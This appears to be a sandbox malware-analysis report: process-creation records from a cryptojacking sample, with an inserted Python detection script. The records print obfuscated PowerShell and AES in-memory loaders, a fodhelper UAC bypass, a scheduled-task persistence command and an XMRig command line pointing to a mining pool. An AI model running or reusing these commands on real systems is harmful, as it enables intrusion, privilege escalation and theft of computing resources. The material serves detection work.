Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:YrWHxoHyNMxl{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$mJbpaFOyxDMlLp,[Parameter(Position=1)][Type]$mBxcLwMzji)$qsXeIcuzIEU=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+''+[Char](102)+''+[Char](108)+''+[Char](101)+''+[Char](99)+''+[Char](116)+'e'+[Char](100)+''+[Char](68)+'e'+[Char](108)+'eg'+'a'+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+'M'+'e'+'m'+'o'+[Char](114)+''+'y'+''+[Char](77)+'o'+'d'+''+[Char](117)+''+'l'+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+'y'+'D'+'e'+''+'l'+'e'+[Char](103)+'a'+[Char](116)+'e'+[Char](84)+''+'y'+''+'p'+'e',''+[Char](67)+''+'l'+'a'+'s'+''+[Char](115)+''+[Char](44)+'P'+[Char](117)+''+'b'+''+'l'+'ic'+[Char](44)+''+[Char](83)+''+[Char](101)+''+[Char](97)+'le'+'d'+','+[Char](65)+''+'n'+'siC'+'l'+'a'+'s'+''+[Char](115)+''+[Char](44)+''+'A'+'ut'+[Char](111)+''+'C'+''+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$qsXeIcuzIEU.DefineConstructor(''+[Char](82)+''+[Char](84)+'Sp'+[Char](101)+''+[Char](99)+''+'i'+'a'+[Char](108)+''+[Char](78)+''+[Char](97)+''+[Char](109)+'e,H'+'i'+''+'d'+'e'+'B'+''+'y'+'S'+[Char](105)+''+'g'+''+[Char](44)+''+[Char](80)+'ub'+[Char](108)+'i'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$mJbpaFOyxDMlLp).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'nt'+'i'+''+'m'+''+'e'+''+[Char](44)+''+'M'+'a'+[Char](110)+''+'a'+''+'g'+''+'e'+''+'d'+'');$qsXeIcuzIEU.DefineMethod('I'+[Char](110)+'v'+'o'+''+[Char](107)+''+'e'+'','P'+[Char](117)+''+[Char](98)+''+[Char](108)+'i'+'c'+''+','+''+'H'+'i'+'d'+''+'e'+'B'+[Char](121)+''+[Char](83)+'i'+'g'+''+','+''+'N'+''+[Char](101)+''+'w'+'S'+[Char](108)+''+[Char](111)+''+[Char](116)+','+'V'+''+[Char](105)+''+'r'+'t'+[Char](117)+'a'+[Char](108)+'',$mBxcLwMzji,$mJbpaFOyxDMlLp).SetImplementationFlags(''+[Char](82)+''+'u'+''+'n'+''+[Char](116)+''+'i'+''+'m'+''+[Char](101)+''+[Char](44)+''+[Char](77)+'a'+[Char](110)+''+[Char](97)+''+'g'+''+[Char](101)+''+'d'+'');Write-Output $qsXeIcuzIEU.CreateType();}$XabpoaxiZGEGR=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+[Char](115)+''+[Char](116)+''+[Char](101)+''+[Char](109)+''+[Char](46)+''+[Char](100)+''+[Char](108)+'l')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+''+[Char](114)+''+'o'+''+'s'+'o'+[Char](102)+''+[Char](116)+''+'.'+''+'W'+''+[Char](105)+'n32'+[Char](46)+'Uns'+'a'+''+[Char](102)+''+[Char](101)+''+[Char](78)+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+'v'+''+[Char](101)+'M'+[Char](101)+''+[Char](116)+'h'+[Char](111)+'d'+[Char](115)+'');$ONnlOWkAfaUoGE=$XabpoaxiZGEGR.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+'P'+'r'+[Char](111)+''+[Char](99)+'A'+[Char](100)+''+'d'+''+[Cha
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:NyGuwfckeOJe{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$kiyDauQzMkkpvQ,[Parameter(Position=1)][Type]$OzRVWwEZvx)$JcZRwmspQGK=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+'f'+[Char](108)+''+[Char](101)+''+'c'+'t'+[Char](101)+''+[Char](100)+''+'D'+'e'+'l'+''+[Char](101)+''+'g'+''+[Char](97)+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('In'+[Char](77)+'e'+[Char](109)+''+[Char](111)+'ry'+[Char](77)+''+'o'+''+'d'+'u'+[Char](108)+''+'e'+'',$False).DefineType(''+'M'+''+[Char](121)+''+[Char](68)+''+'e'+''+[Char](108)+''+[Char](101)+''+[Char](103)+'a'+[Char](116)+''+[Char](101)+''+[Char](84)+'yp'+'e'+'',''+'C'+''+'l'+''+'a'+''+'s'+'s,P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+'c'+','+''+[Char](83)+''+[Char](101)+''+'a'+'le'+'d'+''+[Char](44)+''+'A'+''+[Char](110)+''+[Char](115)+''+[Char](105)+''+'C'+''+[Char](108)+''+'a'+''+[Char](115)+'s'+[Char](44)+''+[Char](65)+'u'+'t'+'o'+[Char](67)+''+'l'+''+'a'+'ss',[MulticastDelegate]);$JcZRwmspQGK.DefineConstructor('RT'+[Char](83)+''+[Char](112)+''+[Char](101)+''+[Char](99)+''+[Char](105)+'a'+'l'+''+[Char](78)+''+[Char](97)+''+[Char](109)+''+'e'+','+'H'+'i'+[Char](100)+'e'+[Char](66)+''+[Char](121)+''+[Char](83)+'ig'+[Char](44)+''+'P'+''+[Char](117)+'b'+[Char](108)+'i'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$kiyDauQzMkkpvQ).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+''+[Char](116)+'ime,'+[Char](77)+''+[Char](97)+''+'n'+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$JcZRwmspQGK.DefineMethod('I'+[Char](110)+''+[Char](118)+''+'o'+''+[Char](107)+''+[Char](101)+'',''+[Char](80)+''+[Char](117)+''+'b'+''+'l'+''+[Char](105)+''+[Char](99)+','+[Char](72)+''+'i'+''+[Char](100)+''+'e'+'B'+'y'+''+[Char](83)+''+[Char](105)+''+[Char](103)+','+'N'+''+[Char](101)+'w'+[Char](83)+''+'l'+''+[Char](111)+''+[Char](116)+''+','+'V'+[Char](105)+'rt'+[Char](117)+''+[Char](97)+''+[Char](108)+'',$OzRVWwEZvx,$kiyDauQzMkkpvQ).SetImplementationFlags('R'+'u'+''+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+'M'+''+[Char](97)+''+[Char](110)+''+'a'+'ge'+'d'+'');Write-Output $JcZRwmspQGK.CreateType();}$fMzQsfZpmgSNo=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+''+[Char](115)+''+[Char](116)+'em'+'.'+''+[Char](100)+'ll')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+''+'r'+''+[Char](111)+''+[Char](115)+''+'o'+''+'f'+''+[Char](116)+'.'+[Char](87)+'in'+[Char](51)+''+[Char](50)+''+[Char](46)+''+'U'+'ns'+'a'+''+'f'+''+'e'+''+[Char](78)+''+'a'+'t'+[Char](105)+''+'v'+'eM'+[Char](101)+''+[Char](116)+''+'h'+'o'+[Char](100)+''+[Char](115)+'');$kCZXEMoRMGVaoJ=$fMzQsfZpmgSNo.GetMethod(''+[Char](71)+''+[Char](101)+''+'t'+''+[
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd.exe /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: unknown Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"WDS100T2B0A" /c:"DADY HARDDISK" /c:"QEMU HARDDISK"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"WDS100T2B0A" /c:"DADY HARDDISK" /c:"QEMU HARDDISK"
Source: unknown Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{b07a7a50-b27b-4e63-a696-921ea5101b06}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{2b935158-6528-4027-b9d5-aa7c0cf2c1f6}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{2754d8d4-2c6c-4f8b-b189-8df08fdb6662}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{c189289e-8452-4651-b13f-f89ff87f8bfd}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"WDS100T2B0A" /c:"DADY HARDDISK" /c:"QEMU HARDDISK"
Source: C:\Users\user\Desktop\e7WMhx18XN.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\b.bat" "
Source: C:\Users\user\Desktop\e7WMhx18XN.exe Process created: C:\Users\user\AppData\Local\Temp\paint.exe "C:\Users\user\AppData\Local\Temp\paint.exe"
Source: C:\Users\user\Desktop\e7WMhx18XN.exe Process created: C:\Users\user\AppData\Local\Temp\FodhelperBypassUAC.exe "C:\Users\user\AppData\Local\Temp\FodhelperBypassUAC.exe"
Source: C:\Windows\System32\svchost.exe Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"WDS100T2B0A" /c:"DADY HARDDISK" /c:"QEMU HARDDISK"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function elgju($CRcTF){ $KmeGB=[System.Security.Cryptography.Aes]::Create(); $KmeGB.Mode=[System.Security.Cryptography.CipherMode]::CBC; $KmeGB.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $KmeGB.Key=[System.Convert]::FromBase64String('yXhq0Zci7Ki7oYmTRrbYbju3J/i3HBqGk5Zcg1aE0Uo='); $KmeGB.IV=[System.Convert]::FromBase64String('WdcPQiNwNN818it8sRh8xg=='); $TgPAd=$KmeGB.CreateDecryptor(); $dQIvJ=$TgPAd.TransformFinalBlock($CRcTF, 0, $CRcTF.Length); $TgPAd.Dispose(); $KmeGB.Dispose(); $dQIvJ;}function VIxdo($CRcTF){ Invoke-Expression '$VBZuZ=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$CRcTF);'.Replace('blck', ''); Invoke-Expression '$sdANW=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$IHCXJ=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($VBZuZ, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $IHCXJ.CopyTo($sdANW); $IHCXJ.Dispose(); $VBZuZ.Dispose(); $sdANW.Dispose(); $sdANW.ToArray();}function gYUmc($CRcTF,$tscxF){ Invoke-Expression '$jaygU=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$CRcTF);'.Replace('blck', ''); Invoke-Expression '$aZTCr=$jaygU.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$aZTCr.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $tscxF)blck;'.Replace('blck', '');}$DuTVY = 'C:\Users\user\AppData\Local\Temp\b.bat';$host.UI.RawUI.WindowTitle = $DuTVY;$FQcuc=[System.IO.File]::ReadAllText($DuTVY).Split([Environment]::NewLine);foreach ($BcNGU in $FQcuc) { if ($BcNGU.StartsWith(':: ')) { $sDcLn=$BcNGU.Substring(3); break; }}$fKndv=[string[]]$sDcLn.Split('\');Invoke-Expression '$pcpOF=VIxdo (elgju (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($fKndv[0])));'.Replace('blck', '');Invoke-Expression '$TAQWK=VIxdo (elgju (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($fKndv[1])));'.Replace('blck', '');gYUmc $pcpOF (,[string[]] (''));gYUmc $TAQWK (,[string[]] (''));
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Users\user\AppData\Local\Temp\paint.exe Process created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "C:\Users\user\AppData\Local\Temp\paint.exe"
Source: C:\Users\user\AppData\Local\Temp\FodhelperBypassUAC.exe Process created: C:\Windows\System32\cmd.exe /c C:\Windows\System32\fodhelper.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\fodhelper.exe C:\Windows\System32\fodhelper.exe
Source: C:\Windows\System32\fodhelper.exe Process created: C:\Windows\System32\cmd.exe "cmd.exe"
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\cmd.exe "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\user\AppData\Local\Temp\services64.exe"
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\cmd.exe "cmd" cmd /c "C:\Users\user\AppData\Local\Temp\services64.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\user\AppData\Local\Temp\services64.exe"
Source: C:\Users\user\AppData\Local\Temp\services64.exe Process created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "C:\Users\user\AppData\Local\Temp\services64.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\services64.exe C:\Users\user\AppData\Local\Temp\services64.exe
Source: C:\Users\user\AppData\Local\Temp\services64.exe Process created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "C:\Users\user\AppData\Local\Temp\services64.exe"
Source: C:\Windows\System32\conhost.exe Process created: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe "C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe"
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=426RNxSSEqcPuv4hwEHkJf7kVHFWs8bprQJpMPxDcRx6RTQxZ7rByiXU4CnMDqrHL4s7VEpMG8Qj77ygdDRvkBU3Ncd1Wx --pass= --cpu-max-threads-hint=40 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-stealth
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe Process created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "/sihost64"
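Taken together, the records above give a compact set of detection opportunities: a legitimate Windows image (explorer.exe) carrying an XMRig-style command line with a pool URL and the SilentXMRMiner `--cinit-*` flags, `wmic diskdrive get Model` piped into `findstr` for VM and sandbox disk models, `fodhelper.exe` spawning `cmd.exe`, a `schtasks /rl highest` task whose target lives under `%TEMP%`, script text echoed into a hidden PowerShell, and `[Char](N)` string assembly. The Python below is an added example, not part of this report or of any vendor ruleset: it parses records in the exact `Source: ... Process created: ...` form used on this page and applies one rule per behaviour to seven of the lines above plus two benign records from the same report (the Defender `MpCmdRun.exe -wdenable` launch and a `conhost.exe` launch) that must stay quiet. The thresholds (two miner flags, five `[Char]` tokens) and the user-writable path list are assumptions chosen for this example; line 7 is a shortened excerpt of a powershell.EXE command line, cut after its first obfuscated string.

```python
"""Added detection example (not part of this report): rules written from the
behaviour visible in the process-creation records above, run over a handful
of those records plus two benign ones to show they stay quiet."""
import re
from typing import Callable, Dict, List, Optional, Tuple

RECORD_RE = re.compile(
    r"^Source:\s+(?P<parent>.+?)\s+Process created:\s+(?P<image>.+?\.exe)(?:\s+(?P<cmdline>.*))?$",
    re.IGNORECASE,
)


def parse_record(line: str) -> Optional[Dict[str, str]]:
    """Split 'Source: <parent> Process created: <image> <cmdline>' into fields."""
    m = RECORD_RE.match(line.strip())
    if not m:
        return None
    r = m.groupdict()
    r["cmdline"] = r["cmdline"] or ""
    r["parent_name"] = r["parent"].rsplit("\\", 1)[-1].lower()
    r["image_name"] = r["image"].rsplit("\\", 1)[-1].lower()
    return r


# Flags seen in the explorer.exe command line on this page (xmrig plus SilentXMRMiner).
MINER_FLAGS = ("--algo=", "--url=", "--cpu-max-threads-hint", "--randomx-mode",
               "--cpu-memory-pool", "--cinit-stealth")
# Disk models the sample greps for before running (sandbox / VM evasion).
SANDBOX_DISK_MODELS = ("qemu harddisk", "dady harddisk", "wds100t2b0a")
# Assumed list of locations an unprivileged user can write to.
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\users\\public\\")


def rule_miner_cmdline(r: Dict[str, str]) -> Optional[str]:
    hits = [f for f in MINER_FLAGS if f in r["cmdline"]]
    return f"{len(hits)} miner flags: {', '.join(hits)}" if len(hits) >= 2 else None


def rule_disk_model_check(r: Dict[str, str]) -> Optional[str]:
    c = r["cmdline"].lower()
    if r["image_name"] == "wmic.exe" and "diskdrive" in c and "model" in c:
        return "disk model enumeration (sandbox check)"
    if r["image_name"] == "findstr.exe" and any(m in c for m in SANDBOX_DISK_MODELS):
        return "findstr against known sandbox/VM disk model strings"
    return None


def rule_fodhelper_child(r: Dict[str, str]) -> Optional[str]:
    # fodhelper.exe is an auto-elevating binary that normally has no children.
    return f"fodhelper.exe spawned {r['image_name']}" if r["parent_name"] == "fodhelper.exe" else None


def rule_schtasks_highest_user_path(r: Dict[str, str]) -> Optional[str]:
    c = r["cmdline"].lower()
    if "schtasks" in c and "/create" in c and "/rl highest" in c and any(p in c for p in USER_WRITABLE):
        return "highest-privilege task pointing into a user-writable path"
    return None


def rule_echo_piped_hidden_powershell(r: Dict[str, str]) -> Optional[str]:
    c = r["cmdline"].lower()
    if "echo " in c and "| powershell" in c and "-windowstyle hidden" in c:
        return "script text echoed into a hidden powershell"
    return None


def rule_obfuscated_powershell(r: Dict[str, str]) -> Optional[str]:
    c = r["cmdline"]
    chars = len(re.findall(r"\[Char\]\(\d+\)", c))
    if chars >= 5 or ("Invoke-Expression" in c and ".Replace('" in c):
        return f"string-assembly obfuscation ({chars} [Char]() tokens)"
    return None


RULES: List[Callable[[Dict[str, str]], Optional[str]]] = [
    rule_miner_cmdline, rule_disk_model_check, rule_fodhelper_child,
    rule_schtasks_highest_user_path, rule_echo_piped_hidden_powershell,
    rule_obfuscated_powershell,
]


def scan(log_text: str) -> List[Tuple[int, str, str, str]]:
    """Return (line number, rule name, image name, detail) for every hit."""
    findings = []
    for n, line in enumerate(log_text.strip().splitlines(), 1):
        r = parse_record(line)
        if r is None:
            continue
        for rule in RULES:
            detail = rule(r)
            if detail:
                findings.append((n, rule.__name__, r["image_name"], detail))
    return findings


# Lines 1-6, 8 and 9 are copied from this report; line 7 is a shortened excerpt.
SAMPLE_LOG = r"""
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=426RNxSSEqcPuv4hwEHkJf7kVHFWs8bprQJpMPxDcRx6RTQxZW7rByiXU4CnMDqrHL4s7VEpMG8Qj77ygdDRvkBU3Ncd1Wx --pass= --cpu-max-threads-hint=40 --cinit-stealth
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"WDS100T2B0A" /c:"DADY HARDDISK" /c:"QEMU HARDDISK"
Source: C:\Windows\System32\fodhelper.exe Process created: C:\Windows\System32\cmd.exe "cmd.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\user\AppData\Local\Temp\services64.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:fuLUlHVbHHgj{...(New-Object Reflection.AssemblyName(''+[Char](82)+'e'+'f'+'l'+'e'+''+'c'+''+[Char](116)+''+[Char](101)+''+[Char](100)+''+[Char](68)+''+'e'+'l'+[Char](101)+''+[Char](103)+''+'a'+''+[Char](116)+''+[Char](101)+''))"
Source: C:\Windows\System32\svchost.exe Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
"""

if __name__ == "__main__":
    for n, rule, image, detail in scan(SAMPLE_LOG):
        print(f"line {n}: {rule} [{image}] {detail}")
```

The miner rule keys on the command line rather than the image name on purpose: here the flags run under `explorer.exe`, and the same check would fire on `sihost64.exe`, `services64.exe` or any other host the injector picks. The `findstr` and `wmic` rules are weak alone but, as parent-child pairs under a `.bat` launched from `C:\Windows\$rbx-onimai2`, they are the earliest signal in this chain.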
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"WDS100T2B0A" /c:"DADY HARDDISK" /c:"QEMU HARDDISK"
